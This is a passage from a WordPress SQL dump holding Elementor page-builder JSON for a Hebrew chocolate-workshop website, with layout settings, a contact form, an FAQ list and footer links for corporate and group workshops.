invalid.\",\"column_gap\":{\"unit\":\"px\",\"size\":0},\"row_gap\":{\"unit\":\"px\",\"size\":0},\"label_color\":\"#ffffff\",\"label_typography_typography\":\"custom\",\"label_typography_font_size\":{\"unit\":\"px\",\"size\":12},\"field_text_color\":\"#000000\",\"field_typography_typography\":\"custom\",\"field_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"field_typography_font_weight\":\"300\",\"field_border_width\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"field_border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"button_background_color\":\"#edd0a8\",\"button_text_color\":\"#ffffff\",\"button_typography_typography\":\"custom\",\"button_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"button_typography_font_weight\":\"600\",\"button_typography_text_transform\":\"uppercase\",\"button_border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"button_background_hover_color\":\"#ed8a00\",\"button_hover_color\":\"#ffffff\",\"input_size\":\"md\",\"button_size\":\"md\",\"email_to\":\"shmulik@shmul.co.il\",\"email_subject\":\"New message from \\\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\\"\",\"email_from\":\"email@chocoded.co.il\",\"email_from_name\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"email_to_2\":\"shmulik@shmul.co.il\",\"email_subject_2\":\"New message from \\\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\\"\",\"email_from_2\":\"email@chocoded.co.il\",\"email_from_name_2\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"email_reply_to_2\":\"shmulik@shmul.co.il\"},\"elements\":[],\"widgetType\":\"form\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(671,147,'_elementor_version','0.4'),(675,148,'_wp_page_template','elementor_canvas'),(676,148,'_elementor_edit_mode','builder'),(677,148,'_elementor_data','[{\"id\":\"5841dc66\",\"elType\":\"section\",\"settings\":{\"custom_height\":{\"unit\":\"px\",\"size\":180},\"content_position\":\"middle\",\"background_background\":\"classic\",\"background_color\":\"#ffffff\",\"margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"00\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"height\":\"min-height\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"border_color\":\"#edd0a8\",\"custom_height_mobile\":{\"unit\":\"px\",\"size\":80},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"custom_height_tablet\":{\"unit\":\"px\",\"size\":124}},\"elements\":[{\"id\":\"4504fb06\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"_inline_size_mobile\":30,\"_inline_size_tablet\":50},\"elements\":[{\"id\":\"b815b78\",\"elType\":\"widget\",\"settings\":{\"__dynamic__\":{\"image\":\"[elementor-tag id=\\\"\\\" name=\\\"site-logo\\\" settings=\\\"%7B%7D\\\"]\",\"link\":\"[elementor-tag id=\\\"\\\" name=\\\"site-url\\\" settings=\\\"%7B%7D\\\"]\"},\"width\":{\"unit\":\"px\",\"size\":120},\"width_mobile\":{\"unit\":\"px\",\"size\":80},\"align_mobile\":\"left\",\"image\":{\"id\":\"38\",\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/placeholder.png\"},\"align\":\"center\"},\"elements\":[],\"widgetType\":\"theme-site-logo\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"76b85204\",\"elType\":\"section\",\"settings\":{\"background_background\":\"gradient\",\"background_color\":\"#e8e8e8\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"60\",\"bottom\":\"0\",\"left\":\"60\",\"isLinked\":false},\"gap\":\"no\",\"background_color_b\":\"#f4f4f4\",\"padding_tablet\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"20\",\"bottom\":\"10\",\"left\":\"20\",\"isLinked\":false},\"sticky\":\"top\"},\"elements\":[{\"id\":\"4855771b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size_mobile\":100},\"elements\":[{\"id\":\"23c8927c\",\"elType\":\"widget\",\"settings\":{\"align_items\":\"justify\",\"animation_line\":\"grow\",\"animation_text\":\"none\",\"color_menu_item\":\"#7a7a7a\",\"color_menu_item_hover\":\"#ffffff\",\"pointer_color_menu_item_hover\":\"#692910\",\"menu_typography_typography\":\"custom\",\"menu_typography_font_size\":{\"unit\":\"px\",\"size\":15},\"pointer_width\":{\"unit\":\"px\",\"size\":3},\"color_dropdown_item\":\"#000000\",\"background_color_dropdown_item\":\"#f2f2f2\",\"color_dropdown_item_hover\":\"#02d3c9\",\"background_color_dropdown_item_hover\":\"#ededed\",\"dropdown_typography_typography\":\"custom\",\"dropdown_typography_font_size\":{\"unit\":\"px\",\"size\":15},\"toggle_color\":\"#02d3c9\",\"toggle_color_hover\":\"#54595f\",\"toggle_size\":{\"unit\":\"px\",\"size\":30},\"toggle_border_width\":{\"unit\":\"px\",\"size\":0},\"toggle_border_radius\":{\"unit\":\"px\",\"size\":0},\"pointer\":\"background\",\"menu_typography_text_transform\":\"uppercase\",\"dropdown\":\"mobile\",\"full_width\":\"stretch\",\"color_menu_item_active\":\"#ffffff\",\"animation_background\":\"sweep-down\",\"padding_vertical_menu_item\":{\"unit\":\"px\",\"size\":18},\"toggle_background_color\":\"rgba(0,0,0,0)\"},\"elements\":[],\"widgetType\":\"nav-menu\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"18f6a107\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"background_background\":\"classic\",\"background_color\":\"#edd0a8\"},\"elements\":[{\"id\":\"305b0fba\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"50499c10\",\"elType\":\"widget\",\"settings\":{\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Open Sans Hebrew\",\"typography_font_size\":{\"unit\":\"px\",\"size\":17},\"typography_font_weight\":\"normal\",\"typography_text_decoration\":\"underline\",\"text_color\":\"#54595f\"},\"elements\":[],\"widgetType\":\"breadcrumbs\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4eb9f6ca\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"2d2198b2\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":70},\"elements\":[{\"id\":\"79ff081e\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d7\\u05d1\\u05e8\\u05d5\\u05ea, \\u05d0\\u05e8\\u05d2\\u05d5\\u05e0\\u05d9\\u05dd \\u05d5\\u05e7\\u05d1\\u05d5\\u05e6\\u05d5\\u05ea\",\"header_size\":\"h1\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"cdcd955\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/groups-choco.jpg\",\"id\":104},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"4d880f94\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>\\u05d0\\u05dd \\u05d0\\u05ea\\u05dd \\u05e8\\u05d5\\u05e6\\u05d9\\u05dd \\u05dc\\u05e7\\u05d7\\u05ea \\u05d9\\u05d5\\u05dd \\u05db\\u05d9\\u05e3 \\u05dc\\u05d7\\u05d1\\u05e8\\u05d9\\u05dd \\u05de\\u05d4\\u05e2\\u05d1\\u05d5\\u05d3\\u05d4, \\u05d4\\u05d2\\u05d9\\u05e2 \\u05d4\\u05d6\\u05de\\u05df \\u05dc\\u05d4\\u05db\\u05d9\\u05e8 \\u05d0\\u05ea \\u05d4\\u05de\\u05ea\\u05db\\u05d5\\u05df \\u05d4\\u05de\\u05d5\\u05e9\\u05dc\\u05dd \\u05dc\\u05d0\\u05d9\\u05d2\\u05d5\\u05d3 \\u05d7\\u05d1\\u05e8\\u05d4 \\u05d1\\u05e6\\u05d5\\u05e8\\u05d4 \\u05d4\\u05de\\u05d5\\u05e9\\u05dc\\u05de\\u05ea \\u05d1\\u05d9\\u05d5\\u05ea\\u05e8.\\u00a0<\\/strong><\\/p><p>\\u05d1\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d7\\u05d1\\u05e8\\u05d5\\u05ea, \\u05d0\\u05e4\\u05e9\\u05e8 \\u05dc\\u05d0\\u05e8\\u05d2\\u05df \\u05d6\\u05d0\\u05ea \\u05d1\\u05e6\\u05d5\\u05e8\\u05d4 \\u05db\\u05d6\\u05d5 \\u05e9\\u05d4\\u05d7\\u05d1\\u05e8\\u05d9\\u05dd \\u05d1\\u05e7\\u05d1\\u05d5\\u05e6\\u05d4 \\u05d9\\u05ea\\u05d7\\u05dc\\u05e7\\u05d5 \\u05dc\\u05e7\\u05d1\\u05d5\\u05e6\\u05d5\\u05ea \\u05d5\\u05d9\\u05db\\u05d9\\u05e0\\u05d5 \\u05d9\\u05d7\\u05d3 \\u05d0\\u05ea \\u05d4\\u05de\\u05e0\\u05d5\\u05ea \\u05d4\\u05d0\\u05d4\\u05d5\\u05d1\\u05d5\\u05ea \\u05e2\\u05dc\\u05d9\\u05d4\\u05dd, \\u05d4\\u05d7\\u05dc \\u05de\\u05dc\\u05d8\\u05de\\u05e4\\u05e8\\u05e8 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d9\\u05d7\\u05d3 \\u05e2\\u05dd \\u05d4\\u05d7\\u05d1\\u05e8\\u05d9\\u05dd \\u05dc\\u05e2\\u05d1\\u05d5\\u05d3\\u05d4 \\u05d5\\u05e2\\u05d3 \\u05dc\\u05e2\\u05e8\\u05d1\\u05d5\\u05d1 \\u05d5\\u05d6\\u05d9\\u05dc\\u05d5\\u05e3 \\u05dc\\u05e2\\u05d5\\u05d2\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05de\\u05d4\\u05e0\\u05d5\\u05ea \\u05d1\\u05de\\u05d9\\u05d5\\u05d7\\u05d3. \\u05d1\\u05d5\\u05d0\\u05d5 \\u05dc\\u05d4\\u05db\\u05d9\\u05df \\u05d0\\u05ea \\u05d4\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d4\\u05d8\\u05e2\\u05d9\\u05dd \\u05d9\\u05d7\\u05d3 \\u05e2\\u05dd \\u05d4\\u05d7\\u05d1\\u05e8 \\u05e9\\u05d0\\u05ea\\u05dd \\u05e8\\u05d2\\u05d9\\u05dc\\u05d9\\u05dd \\u05dc\\u05d4\\u05db\\u05d9\\u05df \\u05d0\\u05d9\\u05ea\\u05d5 \\u05e1\\u05dc\\u05d8, \\u05dc\\u05d0 \\u05d4\\u05d2\\u05d9\\u05e2 \\u05d4\\u05d6\\u05de\\u05df \\u05dc\\u05d3\\u05e2\\u05ea \\u05dc\\u05d4\\u05db\\u05d9\\u05df \\u05d9\\u05d7\\u05d3 \\u05d2\\u05dd \\u05d0\\u05ea \\u05d4\\u05e7\\u05d9\\u05e0\\u05d5\\u05d7?\\u00a0<\\/p><p>\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"fd9ed4d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":30},\"elements\":[{\"id\":\"16c16700\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05d9\\u05e6\\u05d9\\u05e8\\u05ea \\u05e7\\u05e9\\u05e8 \\u05de\\u05d4\\u05d9\\u05e8\\u05d4\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"76bff3cc\",\"elType\":\"widget\",\"settings\":{\"form_name\":\"New Form\",\"form_fields\":[{\"_id\":\"name\",\"field_type\":\"text\",\"field_label\":\"\\u05e9\\u05dd\",\"placeholder\":\"\\u05e9\\u05dd\",\"width\":\"100\",\"field_value\":\"\",\"required\":\"true\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"custom_id\":\"name\"},{\"_id\":\"email\",\"field_type\":\"email\",\"required\":\"true\",\"field_label\":\"\\u05de\\u05d9\\u05d9\\u05dc\",\"placeholder\":\"\\u05de\\u05d9\\u05d9\\u05dc\",\"width\":\"100\",\"field_value\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"custom_id\":\"email\"},{\"field_type\":\"tel\",\"field_label\":\"\\u05d8\\u05dc\'\",\"field_value\":\"\",\"placeholder\":\"\\u05d8\\u05dc\'\",\"required\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width\":\"100\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"_id\":\"field_1\",\"custom_id\":\"field_1\"}],\"input_size\":\"md\",\"show_labels\":\"\",\"button_text\":\"\\u05e9\\u05dc\\u05d7\\u05d5 \\u05e4\\u05e8\\u05d8\\u05d9\\u05dd\",\"button_icon\":\"fa fa-envelope\",\"email_to\":\"shmulik@shmul.co.il\",\"email_subject\":\"New message from \\\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05d3\\u05d3\\\"\",\"email_content\":\"[all-fields]\",\"email_from\":\"email@chocoded.co.il\",\"email_from_name\":\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05d3\\u05d3\",\"email_to_2\":\"shmulik@shmul.co.il\",\"email_subject_2\":\"New message from \\\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05d3\\u05d3\\\"\",\"email_content_2\":\"[all-fields]\",\"email_from_2\":\"email@chocoded.co.il\",\"email_from_name_2\":\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05d3\\u05d3\",\"email_reply_to_2\":\"shmulik@shmul.co.il\",\"success_message\":\"The form was sent successfully!\",\"error_message\":\"Please fill in the required fields.\",\"required_field_message\":\"Required\",\"invalid_message\":\"There\'s something wrong. The form is invalid.\"},\"elements\":[],\"widgetType\":\"form\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"67cc34f9\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"background_background\":\"classic\",\"background_color\":\"#edd0a8\"},\"elements\":[{\"id\":\"6c196b7b\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"7827cc50\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e9\\u05d0\\u05dc\\u05d5\\u05ea \\u05e9\\u05ea\\u05de\\u05d9\\u05d3 \\u05e0\\u05e9\\u05d0\\u05dc\\u05d5\\u05ea:\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"7b209b5a\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"\\u05db\\u05df, \\u05d0\\u05e4\\u05e9\\u05e8 \\u05d1\\u05de\\u05e9\\u05e8\\u05d3 \\/ \\u05d1\\u05d9\\u05ea (\\u05d0\\u05ea\\u05dd \\u05ea\\u05d7\\u05dc\\u05d9\\u05d8\\u05d5)\",\"icon\":\"fa fa-check\",\"_id\":\"00c967d\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d9\\u05db\\u05d5\\u05dc\\u05d4 \\u05dc\\u05d4\\u05d9\\u05d5\\u05ea \\u05d1\\u05d9\\u05df \\u05e9\\u05e2\\u05ea\\u05d9\\u05d9\\u05dd \\u05dc4\",\"icon\":\"fa fa-check\",\"_id\":\"dad4d48\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05dc\\u05d0, \\u05d0\\u05dc \\u05ea\\u05d1\\u05d9\\u05d0\\u05d5 \\u05e1\\u05d9\\u05e0\\u05e8, \\u05d6\\u05d4 \\u05e2\\u05dc\\u05d9\\u05e0\\u05d5\",\"icon\":\"fa fa-check\",\"_id\":\"1ecee46\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05db\\u05df, \\u05d0\\u05ea\\u05dd \\u05ea\\u05e7\\u05d7\\u05d5 \\u05d4\\u05d1\\u05d9\\u05ea\\u05d4 \\u05d0\\u05ea \\u05d4\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05e9\\u05d4\\u05db\\u05e0\\u05ea\\u05dd (\\u05d0\\u05dd \\u05d9\\u05d9\\u05e9\\u05d0\\u05e8)\",\"icon\":\"fa fa-check\",\"_id\":\"fc43a28\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05dc\\u05d0, \\u05dc\\u05d0 \\u05de\\u05e9\\u05e0\\u05d4 \\u05db\\u05de\\u05d4 \\u05d0\\u05e0\\u05e9\\u05d9\\u05dd \\u05d9\\u05d4\\u05d9\\u05d5, \\u05d0\\u05ea\\u05dd \\u05ea\\u05d7\\u05dc\\u05d9\\u05d8\\u05d5\",\"icon\":\"fa fa-check\",\"_id\":\"3135133\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}}],\"icon_align\":\"right\",\"icon_size\":{\"unit\":\"px\",\"size\":18},\"text_indent\":{\"unit\":\"px\",\"size\":10},\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":21},\"icon_typography_line_height\":{\"unit\":\"em\",\"size\":1.8}},\"elements\":[],\"widgetType\":\"icon-list\"}],\"isInner\":false},{\"id\":\"741268fa\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"2e2f4f1b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/logoup.png\",\"id\":33}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4cf30a76\",\"elType\":\"section\",\"settings\":{\"content_position\":\"middle\",\"background_background\":\"gradient\",\"background_color\":\"#575860\",\"margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\":\"70\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"15\",\"bottom\":\"20\",\"left\":\"15\",\"isLinked\":false},\"background_color_b\":\"#3a3a3a\",\"background_gradient_angle\":{\"unit\":\"deg\",\"size\":360},\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"border_color\":\"#edd0a8\"},\"elements\":[{\"id\":\"597acd0a\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"3e133b51\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"1928fd03\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":25,\"_inline_size_tablet\":33,\"_inline_size_mobile\":33},\"elements\":[{\"id\":\"75c70511\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"title_color\":\"#edd0a8\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15},\"typography_font_weight\":\"600\",\"typography_text_transform\":\"uppercase\",\"header_size\":\"h4\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"696cb5d\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d6\\u05d5\\u05d2\\u05d9\\u05ea\",\"icon\":\"\",\"_id\":\"a3a66d7\",\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/%D7%A1%D7%93%D7%A0%D7%AA-%D7%A9%D7%95%D7%A7%D7%95%D7%9C%D7%93-%D7%96%D7%95%D7%92%D7%99%D7%AA\\/\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05e1\\u05d9\\u05d1\\u05ea \\u05e8\\u05d5\\u05d5\\u05e7\\u05d5\\u05ea\",\"icon\":\"\",\"_id\":\"7a91d3f\",\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/%D7%A1%D7%93%D7%A0%D7%AA-%D7%A9%D7%95%D7%A7%D7%95%D7%9C%D7%93-%D7%9C%D7%9E%D7%A1%D7%99%D7%91%D7%AA-%D7%A8%D7%95%D7%95%D7%A7%D7%95%D7%AA\\/\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d7\\u05d1\\u05e8\\u05d5\\u05ea \\u05d5\\u05d0\\u05e8\\u05d2\\u05d5\\u05e0\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"8c21433\",\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/%D7%A1%D7%93%D7%A0%D7%AA-%D7%A9%D7%95%D7%A7%D7%95%D7%9C%D7%93-%D7%9C%D7%97%D7%91%D7%A8%D7%95%D7%AA\\/\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d9\\u05dc\\u05d3\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"ad388f0\",\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/%D7%A1%D7%93%D7%A0%D7%AA-%D7%A9%D7%95%D7%A7%D7%95%D7%9C%D7%93-%D7%9C%D7%99%D7%9C%D7%93%D7%99%D7%9D\\/\",\"is_external\":\"\",\"nofollow\":\"\"}}],\"space_between\":{\"unit\":\"px\",\"size\":5},\"icon_size\":{\"unit\":\"px\",\"size\":6},\"text_color\":\"#ffffff\",\"text_indent\":{\"unit\":\"px\",\"size\":0},\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"icon_typography_font_weight\":\"300\",\"icon_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":13}},\"elements\":[],\"widgetType\":\"icon-list\"}],\"isInner\":true},{\"id\":\"53ab1cb7\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":25,\"_inline_size_tablet\":33,\"_inline_size_mobile\":33},\"elements\":[{\"id\":\"6e36d1ee\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e7\\u05d5\\u05e8\\u05e1\\u05d9\\u05dd \\u05e2\\u05dd \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"title_color\":\"#edd0a8\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15},\"typography_font_weight\":\"600\",\"typography_text_transform\":\"uppercase\",\"header_size\":\"h4\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"1f57f173\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"\\u05e7\\u05d5\\u05e8\\u05e1 \\u05e4\\u05e8\\u05dc\\u05d9\\u05e0\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"a3a66d7\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e7\\u05d5\\u05e8\\u05e1 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d8\\u05d9\\u05d9\\u05e8\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"a70e4bf\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e7\\u05d5\\u05e8\\u05e1 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05ea\\u05d7\\u05d9\\u05dc\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"30a3b9f\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}}],\"space_between\":{\"unit\":\"px\",\"size\":5},\"icon_size\":{\"unit\":\"px\",\"size\":6},\"text_color\":\"#ffffff\",\"text_indent\":{\"unit\":\"px\",\"size\":0},\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"icon_typography_font_weight\":\"300\",\"icon_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":13}},\"elements\":[],\"widgetType\":\"icon-list\"}],\"isInner\":true},{\"id\":\"40160807\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":49.999,\"_inline_size_tablet\":100,\"margin_tablet\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\",\"isLinked\":true}},\"elements\":[{\"id\":\"7a7786f4\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05dc\\u05d3\\u05e2\\u05ea \\u05de\\u05ea\\u05d9 \\u05d4\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d4\\u05d1\\u05d0\\u05d4\",\"title_color\":\"#edd0a8\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15},\"typography_font_weight\":\"600\",\"typography_text_transform\":\"uppercase\",\"header_size\":\"h4\",\"align_tablet\":\"center\",\"align_mobile\":\"left\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"4a0e521a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u05e8\\u05d5\\u05e6\\u05d9\\u05dd \\u05dc\\u05d3\\u05e2\\u05ea \\u05de\\u05ea\\u05d9 \\u05d4\\u05e1\\u05d3\\u05e0\\u05d4 